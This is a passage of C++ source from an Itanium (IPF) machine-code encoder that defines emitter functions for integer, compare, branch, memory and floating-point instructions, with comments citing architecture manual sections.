        encode( // 4.5.3.2
            opc_enc.B8_B9(2, 0),
            imm_enc.I19_M37_B9_F15(imm21),
            0
        );
        break;
    default:
        assert(0); // no nop format for this syllable type
    }
}
// Integer ALU instruction emitters.  Each builds its opcode, immediate
// and register fragments and deposits them via encode() under the given
// qualifying predicate.  Section numbers refer to the Itanium SDM vol 3.
// Note the A-format register convention: r1 = r2 op r3, so the second
// source is passed as r3 and the first as r2.
void Merced_Encoder::ipf_add(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    encode( // 4.2.1.1
        opc_enc.A1_A2_A3_A4(8, 0, 0, 0, 0),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_sub(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    encode( // 4.2.1.1
        opc_enc.A1_A2_A3_A4(8, 0, 0, 1, 1),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_addp4(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    encode( // 4.2.1.1
        opc_enc.A1_A2_A3_A4(8, 0, 0, 2, 0),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_and(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    encode( // 4.2.1.1
        opc_enc.A1_A2_A3_A4(8, 0, 0, 3, 0),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_or(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    encode( // 4.2.1.1
        opc_enc.A1_A2_A3_A4(8, 0, 0, 3, 2),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_xor(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    encode( // 4.2.1.1
        opc_enc.A1_A2_A3_A4(8, 0, 0, 3, 3),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_shladd(unsigned dest, unsigned src1, int count, unsigned src2, unsigned pred)
{
    // dest = (src1 << count) + src2, count in 1..4.
    encode( // 4.2.1.2
        opc_enc.A1_A2_A3_A4(8, 0, 0, 4),
        imm_enc.A2(count),
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_subi(unsigned dest, int imm, unsigned src, unsigned pred)
{
    // dest = imm - src (8-bit signed immediate form).
    encode( // 4.2.1.3
        opc_enc.A1_A2_A3_A4(8, 0, 0, 9, 1),
        imm_enc.A3_A8_I27_M30(imm),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_andi(unsigned dest, int imm, unsigned src, unsigned pred)
{
    encode( // 4.2.1.3
        opc_enc.A1_A2_A3_A4(8, 0, 0, 0xB, 0),
        imm_enc.A3_A8_I27_M30(imm),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_ori(unsigned dest, int imm, unsigned src, unsigned pred)
{
    encode( // 4.2.1.3
        opc_enc.A1_A2_A3_A4(8, 0, 0, 0xB, 2),
        imm_enc.A3_A8_I27_M30(imm),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_xori(unsigned dest, int imm, unsigned src, unsigned pred)
{
    encode( // 4.2.1.3
        opc_enc.A1_A2_A3_A4(8, 0, 0, 0xB, 3),
        imm_enc.A3_A8_I27_M30(imm),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_adds(unsigned dest, int imm14, unsigned src, unsigned pred)
{
    // dest = imm14 + src (14-bit signed immediate).
    encode( // 4.2.1.3
        opc_enc.A1_A2_A3_A4(8, 2, 0),
        imm_enc.A4(imm14),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_addl(unsigned dest, int imm22, unsigned src, unsigned pred)
{
    // dest = imm22 + src (22-bit signed immediate, A5 format).
    encode( // 4.2.1.3
        opc_enc.A5_I15(9),
        imm_enc.A5(imm22),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_addp4i(unsigned dest, int imm14, unsigned src, unsigned pred)
{
    encode( // 4.2.1.3
        opc_enc.A1_A2_A3_A4(8, 3, 0),
        imm_enc.A4(imm14),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
// Emit an integer compare (formats A6/A7).  The hardware only encodes a
// few relations directly (lt, ltu, eq), so other relations are reduced to
// those by swapping the predicate targets and/or the source registers.
// For parallel compares (and/or/or.andcm) A7 requires r2 == r0, so when
// r3 is r0 the relation is mirrored and the registers swapped.
void Merced_Encoder::ipf_cmp(Int_Comp_Rel xcr, Compare_Extension cx, unsigned xp1, unsigned xp2, unsigned xr2, unsigned xr3, bool cmp4, unsigned pred)
{
    unsigned x2, tb = 0, ta = 0, c = 0;
    unsigned opcode=0, p1=xp1, p2=xp2, r2=xr2, r3=xr3;
    Int_Comp_Rel cr;
    if (cx==cmp_none || cx==cmp_unc)
    {
        // Normal / unconditional compare: reduce the relation to lt/ltu/eq.
        switch (xcr)
        { //switch predicates (these relations are the negations of encodable ones)
        case icmp_ne:
        case icmp_ge:
        case icmp_geu:
        case icmp_le:
        case icmp_leu:
            p1 = xp2; p2 = xp1; break;
        default: break;
        }
        switch (xcr)
        { // switch registers (mirror the relation: a<=b  <=>  b>=a, etc.)
        case icmp_le:
        case icmp_gt:
        case icmp_leu:
        case icmp_gtu:
            r2 = xr3;
            r3 = xr2;
            break;
        default: break;
        }
        switch (xcr)
        { // reassign cr to the encodable relation and pick the major opcode
        case icmp_lt:
        case icmp_le:
        case icmp_gt:
        case icmp_ge:
            cr = icmp_lt;
            opcode = 0xC;
            break;
        case icmp_ltu:
        case icmp_leu:
        case icmp_gtu:
        case icmp_geu:
            cr = icmp_ltu;
            opcode = 0xD;
            break;
        case icmp_eq:
        case icmp_ne:
            cr = icmp_eq;
            opcode = 0xE;
            break;
        default:
            assert(0); // compare type not covered
        }
        switch (cx)
        { // assign bits (c distinguishes unconditional form)
        case cmp_none:
            tb = 0; ta = 0; c = 0; break;
        case cmp_unc:
            tb = 0; ta = 0; c = 1; break;
        default:
            assert(0);
        }
    }
    else if (cx==cmp_and || cx==cmp_or || cx==cmp_or_andcm) // parallel compares
    {
        cr = xcr;
        if (r3==0 && (xcr!=icmp_eq && xcr!=icmp_ne))
        { // if r3 is register 0 then switch (the zero register must be r3)
            assert(r2!=0); // compare zero with zero?
            switch (xcr)
            {
            case icmp_lt:
                cr = icmp_gt;
                break;
            case icmp_le:
                cr = icmp_ge;
                break;
            case icmp_gt:
                cr = icmp_lt;
                break;
            case icmp_ge:
                cr = icmp_le;
                break;
            default: assert(0);
            }
            // switch registers
            r2 = xr3;
            r3 = xr2;
        }
        switch (cx)
        { // assign opcode
        case cmp_and:
            opcode = 0xC;
            break;
        case cmp_or:
            opcode = 0xD;
            break;
        case cmp_or_andcm:
            opcode = 0xE;
            break;
        default:
            assert(0); // compare type not covered
        }
        switch (cr)
        { // assign bits: tb/ta/c select the relation within the opcode
        case icmp_eq:
            tb = 0; ta = 1; c = 0; break;
        case icmp_ne:
            tb = 0; ta = 1; c = 1; break;
        case icmp_gt:
            tb = 1; ta = 0; c = 0; break;
        case icmp_le:
            tb = 1; ta = 0; c = 1; break;
        case icmp_ge:
            tb = 1; ta = 1; c = 0; break;
        case icmp_lt:
            tb = 1; ta = 1; c = 1; break;
        default:
            assert(0);
        }
    }
    else
        assert(0);
    // x2 selects 32-bit (cmp4) vs 64-bit comparison.
    if (cmp4)
        x2 = 1;
    else
        x2 = 0;
    assert(opcode);
    encode( // 21.2.2
        opc_enc.A6_A7(opcode, tb, x2, ta, c),
        0,
        reg_enc.P2_P1_R3_R2(p2, p1, r3, r2),
        pred
    );
}
// Compare a register against zero: delegate to ipf_cmp with r0 (the
// hardwired zero register) as the first source.
void Merced_Encoder::ipf_cmpz(Int_Comp_Rel cr, Compare_Extension cx, unsigned xp1, unsigned xp2, unsigned r3, bool cmp4, unsigned pred)
{
    ipf_cmp(cr, cx, xp1, xp2, 0, r3, cmp4, pred);
}
// Emit a compare-with-immediate (format A8).  As with ipf_cmp, only
// lt/ltu/eq are encodable: other relations are reduced by swapping the
// predicate targets and/or adjusting the immediate by one
// (a <= b  <=>  a < b+1, expressed here as imm-1 on the mirrored form).
void Merced_Encoder::ipf_cmpi(Int_Comp_Rel xcr, Compare_Extension cx, unsigned xp1, unsigned xp2, int ximm, unsigned xr3, bool cmp4, unsigned pred)
{
    unsigned x2, ta = 0, c = 0;
    unsigned opcode=0, p1=xp1, p2=xp2, r3=xr3;
    int imm = ximm;
    Int_Comp_Rel cr;
    if (cx==cmp_none || cx==cmp_unc)
    {
        switch (xcr)
        { //switch predicates (negated relations)
        case icmp_ne:
        case icmp_ge:
        case icmp_geu:
        case icmp_gt:
        case icmp_gtu:
            p1 = xp2; p2 = xp1;
            break;
        default:
            break; // do nothing
        }
        switch (xcr)
        { // subtract 1 from the immediate
        case icmp_le:
        case icmp_gt:
        case icmp_leu:
        case icmp_gtu:
            imm = ximm - 1;
            break;
        default:
            break; // do nothing
        }
        switch (xcr)
        { // reassign cr to the encodable relation and pick the opcode
        case icmp_lt:
        case icmp_le:
        case icmp_gt:
        case icmp_ge:
            cr = icmp_lt;
            opcode = 0xC;
            break;
        case icmp_ltu:
        case icmp_leu:
        case icmp_gtu:
        case icmp_geu:
            cr = icmp_ltu;
            opcode = 0xD;
            break;
        case icmp_eq:
        case icmp_ne:
            cr = icmp_eq;
            opcode = 0xE;
            break;
        default:
            assert(0); // compare type not covered
        }
        switch (cx)
        { // assign bits (c distinguishes unconditional form)
        case cmp_none:
            ta = 0; c = 0; break;
        case cmp_unc:
            ta = 0; c = 1; break;
        default:
            assert(0);
        }
    }
    else if (cx==cmp_and || cx==cmp_or || cx==cmp_or_andcm) // parallel compares
    {
        // Immediate parallel compares only support eq/ne.
        cr = xcr;
        switch (cx)
        { // assign opcode
        case cmp_and:
            opcode = 0xC;
            break;
        case cmp_or:
            opcode = 0xD;
            break;
        case cmp_or_andcm:
            opcode = 0xE;
            break;
        default:
            assert(0); // compare type not covered
        }
        switch (cr)
        { // assign bits
        case icmp_eq:
            ta = 1; c = 0; break;
        case icmp_ne:
            ta = 1; c = 1; break;
        default:
            assert(0);
        }
    }
    else
        assert(0);
    // x2 selects the immediate form: 3 = 32-bit (cmp4), 2 = 64-bit.
    if (cmp4)
        x2 = 3;
    else
        x2 = 2;
    assert(opcode);
    encode( // 21.2.2.3
        opc_enc.A8(opcode, x2, ta, c),
        imm_enc.A3_A8_I27_M30((unsigned)imm),
        reg_enc.P2_P1_R3(p2, p1, r3),
        pred
    );
}
void Merced_Encoder::ipf_movl(unsigned dest, unsigned upper_32, unsigned lower_32, unsigned pred)
{
    // movl: load a full 64-bit constant (given as two 32-bit halves) into
    // dest.  Uses the two-slot long-immediate form: the imm41 portion
    // (upper_32 minus its sign bit, plus lower_32 bits 31..22) goes into
    // the extension slot via encode_long.
    encode_long( // 4.3.4
        opc_enc.I18(6, 0),
        imm_enc.I18(upper_32, lower_32),
        (upper_32 & 0x7FFFFFFF),
        (lower_32 & 0xFFC00000) >> 22,
        reg_enc.R1(dest),
        pred
    );
}
void Merced_Encoder::ipf_brl_call(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b1, uint64 imm64, unsigned pred)
{
    // brl.call (format X4): split the 64-bit bundle-aligned displacement
    // imm64 into imm20b (low), imm39 (middle) and i (sign bit).
    uint64 temp = imm64;
    unsigned i;
    uint64 imm39;
    unsigned imm20b;
    temp >>= 4; // ignore 4 least significant bits
    imm20b = (unsigned)(temp & 0xfFfFf);
    temp >>= 20;
    imm39 = temp & 0x7fFFFFffff;
    temp >>= 39;
    i = (unsigned)(temp & 1);
    temp >>= 1;
    assert(temp == 0); // displacement must fit in 64 bundle-aligned bits
    encode_long_X3_X4(0xd, ph, wh, dh, b1, i, imm39, imm20b, pred);
} //Merced_Encoder::ipf_brl_call
void Merced_Encoder::rewrite_brl_call_target(const unsigned char * oldBundle, uint64 newTarget) {
    // Patch the displacement of an existing brl.call bundle in place:
    // copy the old bundle bytes, then overwrite only the i/imm20b/imm39
    // fields with the new target (same field split as ipf_brl_call).
    slot_num = 0;
    for (int index = 0; index < IPF_INSTRUCTION_LEN; index++)
        _char_value[index] = oldBundle[index];
    newTarget >>= 4; // ignore 4 least significant bits
    unsigned imm20b = (unsigned)(newTarget & 0xfFfFf);
    newTarget >>= 20;
    uint64 imm39 = newTarget & 0x7fFFFFffff;
    newTarget >>= 39;
    unsigned i = (unsigned)(newTarget & 1);
    newTarget >>= 1;
    assert(newTarget == 0);
    // X-format long branch always occupies slots 1 and 2 of the bundle.
    int slot1 = 2;
    int slot2 = 1;
    // Encode i
    slot_rewrite(slot1, i, 36, 1); // 36..36
    // Encode imm20b
    slot_rewrite(slot1, imm20b, 13, 20); // 13..32
    // Encode imm39 in two chunks since slot_encode can't take a 64-bit
    // constant as an argument.
    slot_rewrite(slot2, (unsigned)((imm39 >> 19) & 0xFffFF), 21, 20);
    slot_rewrite(slot2, (unsigned)(imm39 & 0x7ffFF), 2, 19);
}
void Merced_Encoder::ipf_brl_cond(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, uint64 imm64, unsigned pred)
{
    // brl.cond (format X3): same displacement split as ipf_brl_call but
    // with opcode 0xC and no branch register.
    uint64 temp = imm64;
    unsigned i;
    uint64 imm39;
    unsigned imm20b;
    temp >>= 4; // ignore 4 least significant bits
    imm20b = (unsigned)(temp & 0xfFfFf);
    temp >>= 20;
    imm39 = temp & 0x7fFFFFffff;
    temp >>= 39;
    i = (unsigned)(temp & 1);
    temp >>= 1;
    assert(temp == 0);
    encode_long_X3_X4(0xC, ph, wh, dh, 0, i, imm39, imm20b, pred);
} //Merced_Encoder::ipf_brl_cond
// Shift, extract, deposit and sign/zero-extend emitters (I-unit formats).
void Merced_Encoder::ipf_shr(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    // Arithmetic (signed) right shift: dest = src1 >> src2.
    // Note the operand order: the value shifted is r3, the count is r2.
    encode( // 4.3.1.5
        opc_enc.I5_I7(7, 1, 0, 1, 0, 0, 2),
        0,
        reg_enc.R3_R2_R1(src1, src2, dest),
        pred
    );
}
void Merced_Encoder::ipf_shru(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    // Logical (unsigned) right shift.
    encode( // 4.3.1.5
        opc_enc.I5_I7(7, 1, 0, 1, 0, 0, 0),
        0,
        reg_enc.R3_R2_R1(src1, src2, dest),
        pred
    );
}
void Merced_Encoder::ipf_shl(unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
    // Left shift; operand order differs from shr (value is r2 here).
    encode( // 4.3.1.7
        opc_enc.I5_I7(7, 1, 0, 1, 0, 1, 0),
        0,
        reg_enc.R3_R2_R1(src2, src1, dest),
        pred
    );
}
void Merced_Encoder::ipf_extr(unsigned dest, unsigned src, int pos6, int len6, unsigned pred)
{
    // Signed bit-field extract of len6 bits starting at pos6.
    encode( // 4.3.2.2
        opc_enc.I10_I11(5, 1, 0, 1),
        imm_enc.I11(len6, pos6),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_extru(unsigned dest, unsigned src, int pos6, int len6, unsigned pred)
{
    // Unsigned bit-field extract.
    encode( // 4.3.2.2
        opc_enc.I10_I11(5, 1, 0, 0),
        imm_enc.I11(len6, pos6),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_depz(unsigned dest, unsigned src, int pos6, int len6, unsigned pred)
{
    // Deposit src into a zeroed destination at pos6 for len6 bits.
    encode( // 4.3.2.3
        opc_enc.I12_I13_I14(5, 1, 1, 0),
        imm_enc.I12(len6, pos6),
        reg_enc.R2_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_depiz(unsigned dest, int imm8, int pos6, int len6, unsigned pred)
{
    // Deposit an 8-bit immediate into a zeroed destination.
    encode( // 4.3.2.4
        opc_enc.I12_I13_I14(5, 1, 1, 1),
        imm_enc.I13(len6, pos6, imm8),
        reg_enc.R1(dest),
        pred
    );
}
void Merced_Encoder::ipf_depi(unsigned dest, int imm1, unsigned src, int pos6, int len6, unsigned pred)
{
    // Deposit a 1-bit immediate into src, result in dest.
    encode( // 4.3.2.5
        opc_enc.I12_I13_I14(5, 3, 1),
        imm_enc.I14(len6, pos6, imm1),
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_dep(unsigned dest, unsigned r2, unsigned r3, int pos6, int len4, unsigned pred)
{
    // General register-to-register deposit (len4 bits at pos6).
    encode( // 4.3.2.6
        opc_enc.A5_I15(4),
        imm_enc.I15(len4, pos6),
        reg_enc.R3_R2_R1(r3, r2, dest),
        pred
    );
}
void Merced_Encoder::ipf_sxt(Sxt_Size size, unsigned dest, unsigned src, unsigned pred)
{
    // Sign-extend from 1/2/4 bytes; x6 selects the width.
    encode( // 4.3.9
        opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, (0x14+size)), // 0x14, 0x15, 0x16
        0,
        reg_enc.R3_R1(src, dest),
        pred
    );
}
void Merced_Encoder::ipf_zxt(Sxt_Size size, unsigned dest, unsigned src, unsigned pred)
{
    // Zero-extend from 1/2/4 bytes.
    encode( // 4.3.9
        opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, (0x10+size)), // 0x10, 0x11, 0x12
        0,
        reg_enc.R3_R1(src, dest),
        pred
    );
}
// Branch and speculation-check emitters.  IP-relative forms compute the
// displacement against _offset (the current emit position).
/// ******** remember, for counted loop, must force qp = 0. See 4.5.1.2
void Merced_Encoder::ipf_br(Branch_Type btype, Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned target25, unsigned pred)
{
    unsigned curr_ip = _offset;
    encode( // 4.5.1.1 and 4.5.1.2
        opc_enc.B1_B2_B3_B4_B5(4, dh, wh, ph),
        imm_enc.B1_B2_B3(target25, curr_ip),
        reg_enc.B1(btype), // btyte occupies the same space as b1, so be tricky
        pred
    );
}
void Merced_Encoder::ipf_brcall(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b1, unsigned target25, unsigned pred)
{
    // IP-relative call; b1 receives the return link.
    unsigned curr_ip = _offset;
    encode( // 4.5.1.3
        opc_enc.B1_B2_B3_B4_B5(5, dh, wh, ph),
        imm_enc.B1_B2_B3(target25, curr_ip),
        reg_enc.B1(b1),
        pred
    );
}
void Merced_Encoder::ipf_bri(Branch_Type btype, Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b2, unsigned pred)
{
    // Indirect branch through branch register b2.
    encode( // 4.5.1.4
        opc_enc.B1_B2_B3_B4_B5(0, dh, wh, ph, 0x20),
        0,
        reg_enc.B2_B1(b2, btype),
        pred
    );
}
// specialized for return
void Merced_Encoder::ipf_brret(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b2, unsigned pred)
{
    encode( // 4.5.1.4
        opc_enc.B1_B2_B3_B4_B5(0, dh, wh, ph, 0x21),
        0,
        reg_enc.B2_B1(b2, 4),
        pred
    );
}
void Merced_Encoder::ipf_bricall(Branch_Prefetch_Hint ph, Branch_Whether_Hint wh, Branch_Dealloc_Hint dh, unsigned b1, unsigned b2, unsigned pred)
{
    // Indirect call through b2; b1 receives the return link.
    encode( // 4.5.1.5
        opc_enc.B1_B2_B3_B4_B5(1, dh, wh, ph),
        0,
        reg_enc.B2_B1(b2, b1),
        pred
    );
}
void Merced_Encoder::ipf_chk_s_i(unsigned src, unsigned target25, unsigned pred) {
    // Speculation check (I-unit): branch to recovery code at target25
    // if src carries a deferred-exception token (NaT).
    unsigned curr_ip = _offset;
    encode( // I20
        opc_enc.I20_I23_I24_M20_M21(0,1),
        imm_enc.I20_M20_M21(target25, curr_ip),
        reg_enc.I20_M20_M21(src),
        pred
    );
}
void Merced_Encoder::ipf_chk_s_m(unsigned src, unsigned target25, unsigned pred) {
    // Speculation check, M-unit variant.
    unsigned curr_ip = _offset;
    encode( // M20
        opc_enc.I20_I23_I24_M20_M21(1,1),
        imm_enc.I20_M20_M21(target25, curr_ip),
        reg_enc.I20_M20_M21(src),
        pred
    );
}
void Merced_Encoder::ipf_chk_f_s(unsigned src, unsigned target25, unsigned pred) {
    // Speculation check for a floating-point register.
    unsigned curr_ip = _offset;
    encode( // M21
        opc_enc.I20_I23_I24_M20_M21(1,3),
        imm_enc.I20_M20_M21(target25, curr_ip),
        reg_enc.I20_M20_M21(src),
        pred
    );
}
void Merced_Encoder::ipf_ld(Int_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.1
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 0, 0),
0,
reg_enc.R3_R1(addrreg, dest),
pred
);
}
void Merced_Encoder::ipf_ld_inc_reg(Int_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_reg, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.2
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 0, 1),
0,
reg_enc.R3_R2_R1(addrreg, inc_reg, dest),
pred
);
}
void Merced_Encoder::ipf_ld_inc_imm(Int_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_imm, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.3
opc_enc.M3_M5_M8_M10_M15(5, x6, hint),
imm_enc.M3_M8_M15(inc_imm),
reg_enc.R3_R1(addrreg, dest),
pred
);
}
void Merced_Encoder::ipf_st(Int_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned pred)
{
unsigned x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.4
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 0, 0),
0,
reg_enc.R3_R2(addrreg, src),
pred
);
}
// Emit an integer store with immediate post-increment of the address register
// (manual 4.4.1.5). Store x6 = load x6 + 0x30; major opcode 5.
void Merced_Encoder::ipf_st_inc_imm(Int_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned inc_imm, unsigned pred)
{
unsigned x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.5
opc_enc.M3_M5_M8_M10_M15(5, x6, hint),
imm_enc.M5_M10(inc_imm),
reg_enc.R3_R2(addrreg, src),
pred
);
}
// Emit a line prefetch (lfetch, format M13).
// The x6 extension starts at 0x2C; the low bit selects the exclusive form
// and the next bit selects the faulting form.
void Merced_Encoder::ipf_lfetch(bool exclusive, bool fault, Lfetch_Hint hint, unsigned addrreg, unsigned pred)
{
    unsigned x6 = 0x2C + (exclusive ? 1 : 0) + (fault ? 2 : 0);
    encode ( // M13
        opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 0),
        0,
        reg_enc.R3(addrreg),
        pred
    );
}
// Emit setf: move a general register into a floating-point register
// (manual 4.4.4.1, format M18). The conversion form is folded into x6.
void Merced_Encoder::ipf_setf(FReg_Convert form, unsigned fdest, unsigned src, unsigned pred)
{
encode( // 4.4.4.1
opc_enc.M18_M19(6, 0, (0x1C+form), 1),
0,
reg_enc.R2_R1(src, fdest),
pred
);
}
// Emit getf: move a floating-point register into a general register
// (manual 4.4.4.2, format M19). Mirror of ipf_setf with major opcode 4.
void Merced_Encoder::ipf_getf(FReg_Convert form, unsigned dest, unsigned fsrc, unsigned pred)
{
encode( // 4.4.4.2
opc_enc.M18_M19(4, 0, (0x1C+form), 1),
0,
reg_enc.R2_R1(fsrc, dest),
pred
);
}
// Emit floating-point multiply-add: dest = src1 * src2 + src3 (format F1,
// manual 4.6.1.1). Bit 1 of the precision completer selects between opcode
// 8 and 9; bit 0 becomes the x extension bit.
void Merced_Encoder::ipf_fma(Float_Precision pc, Float_Status_Field sf, unsigned dest, unsigned src1, unsigned src2, unsigned src3, unsigned pred)
{
    unsigned opcode = 0x8 + ((pc >> 1) & 1); // either 8 or 9
    unsigned x = pc & 1;                     // either 0 or 1
    encode( // 4.6.1.1
        opc_enc.F1_F2_F3(opcode, x, sf),
        0,
        reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
        pred
    );
}
// Emit floating-point negative multiply-add (format F1, manual 4.6.1.1).
// Precision completer bit 1 picks opcode 0xD vs 0xC; bit 0 becomes x.
void Merced_Encoder::ipf_fnma(Float_Precision pc, Float_Status_Field sf, unsigned dest, unsigned src1, unsigned src2, unsigned src3, unsigned pred)
{
unsigned opcode = (pc & 0x2) ? 0xD : 0xC; // either D or C
unsigned x = (pc & 0x1) ? 1 : 0; // either 1 or 0
encode( // 4.6.1.1
opc_enc.F1_F2_F3(opcode, x, sf),
0,
reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
pred
);
}
// Emit floating-point multiply-subtract (format F1, manual 4.6.1.1).
// Precision completer bit 1 picks opcode 0xB vs 0xA; bit 0 becomes x.
void Merced_Encoder::ipf_fms(Float_Precision pc, Float_Status_Field sf, unsigned dest, unsigned src1, unsigned src2, unsigned src3, unsigned pred)
{
unsigned opcode = (pc & 0x2) ? 0xB : 0xA; // either B or A
unsigned x = (pc & 0x1) ? 1 : 0; // either 1 or 0
encode( // 4.6.1.1
opc_enc.F1_F2_F3(opcode, x, sf),
0,
reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
pred
);
}
// Emit frcpa, the reciprocal-approximation instruction (format F6).
// opcode/x/q are fixed for this instruction; p2 receives the result
// predicate alongside the fdest register.
void Merced_Encoder::ipf_frcpa(Float_Status_Field sf, unsigned dest, unsigned p2, unsigned src1, unsigned src2, unsigned pred)
{
unsigned opcode = 0;
unsigned x = 1;
unsigned q = 0;
encode(
opc_enc.F6(opcode, q, sf, x),
0,
reg_enc.P2_F3_F2_F1(p2, src2, src1, dest),
pred
);
}
// Emit fmerge (format F9); the merge variant fm is folded into the x6
// extension at base 0x10.
void Merced_Encoder::ipf_fmerge(Float_Merge fm, unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.6.1.1
opc_enc.F8_F9_F10_F11_F12_F13(0, 0, (0x10+fm)),
0,
reg_enc.F3_F2_F1(src2, src1, dest),
pred
);
}
// Emit a floating-point compare (format F4, manual 4.6.3.1).
//
// The hardware directly supports only eq, lt, le and unord (selected through
// the ra/rb bits). The extended relations are mapped onto those:
//   - negated forms (neq, nlt, nle, ngt, nge, ord) swap the two predicate
//     targets p1/p2;
//   - gt/ge forms swap the two source registers (a > b  <=>  b < a).
// cx selects the normal (ta=0) or unconditional (ta=1) compare type.
//
// Fix: the original kept a local Float_Comp_Rel 'cr' that was assigned in
// the third switch but never read on any path; the dead stores are removed.
void Merced_Encoder::ipf_fcmp(Float_Comp_Rel xcr, Compare_Extension cx, unsigned xp1, unsigned xp2, unsigned xf2, unsigned xf3, unsigned pred)
{
    unsigned ra = 0, rb = 0, sf, ta = 0;
    unsigned p1 = xp1, p2 = xp2, f2 = xf2, f3 = xf3;
    switch (xcr)
    { // negated relations: swap predicate targets
    case fcmp_neq:
    case fcmp_nlt:
    case fcmp_nle:
    case fcmp_ngt:
    case fcmp_nge:
    case fcmp_ord:
        p1 = xp2; p2 = xp1; break;
    default: break;
    }
    switch (xcr)
    { // gt/ge relations: swap source registers
    case fcmp_gt:
    case fcmp_ge:
    case fcmp_ngt:
    case fcmp_nge:
        f2 = xf3;
        f3 = xf2;
        break;
    default: break;
    }
    switch (xcr)
    { // select the ra/rb encoding of the base relation
    case fcmp_eq:
    case fcmp_neq:
        ra = 0; rb = 0;
        break;
    case fcmp_lt:
    case fcmp_gt:
    case fcmp_nlt:
    case fcmp_ngt:
        ra = 0; rb = 1;
        break;
    case fcmp_le:
    case fcmp_ge:
    case fcmp_nle:
    case fcmp_nge:
        ra = 1; rb = 0;
        break;
    case fcmp_unord:
    case fcmp_ord:
        ra = 1; rb = 1;
        break;
    default:
        assert(0); // compare type not covered
    }
    switch (cx)
    { // assign ta (0 = normal, 1 = unconditional)
    case cmp_none:
        ta = 0; break;
    case cmp_unc:
        ta = 1; break;
    default:
        assert(0);
    }
    sf = 0; // status field 0
    encode( // 4.6.3.1
        opc_enc.F4(4, rb, sf, ra, ta),
        0,
        reg_enc.P2_P1_F3_F2(p2, p1, f3, f2),
        pred
    );
}
// Emit fclass, the floating-point class test (format F5, manual 4.6.3.2).
// The 9-bit class mask is split into a 2-bit low field (fc2) and a 7-bit
// high field (fclass7c); cx selects the normal or unconditional compare.
void Merced_Encoder::ipf_fclass(Compare_Extension cx, unsigned p1, unsigned p2, unsigned f2, unsigned fclass9, unsigned pred)
{
    unsigned fc2 = fclass9 & 3;
    unsigned fclass7c = fclass9 >> 2;
    unsigned ta = 0;
    if (cx == cmp_unc)
        ta = 1;
    else
        assert(cx == cmp_none); // only none/unc compare extensions supported
    encode( // 4.6.3.2
        opc_enc.F5(5, fc2, fclass7c, ta),
        0,
        reg_enc.P2_P1_F2(p2, p1, f2),
        pred
    );
}
// Emit float-to-fixed conversion (manual 4.6.7.1). The conversion variant
// fc is folded into x6 at base 0x18.
